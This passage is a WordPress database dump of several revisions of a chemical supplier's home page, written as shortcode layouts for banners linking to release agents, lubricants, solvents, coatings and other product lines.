INSERT INTO `wp_posts` VALUES (1506, 1, '2016-09-11 16:07:14', '2016-09-11 16:07:14', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n<div>\r\n</div>\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:07:14', '2016-09-11 16:07:14', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1507, 1, '2016-09-11 16:07:31', '2016-09-11 16:07:31', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n<div>\r\n<br/>\r\n</div>\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:07:31', '2016-09-11 16:07:31', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1508, 1, '2016-09-11 16:07:52', '2016-09-11 16:07:52', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n<div>\r\n<br/>\r\n</div>\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:07:52', '2016-09-11 16:07:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1509, 1, '2016-09-11 16:08:56', '2016-09-11 16:08:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:08:56', '2016-09-11 16:08:56', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1510, 1, '2016-09-11 16:09:14', '2016-09-11 16:09:14', '[ux_banner_grid height="400px" padding="110px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:09:14', '2016-09-11 16:09:14', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1511, 1, '2016-09-11 16:10:35', '2016-09-11 16:10:35', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="142px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" 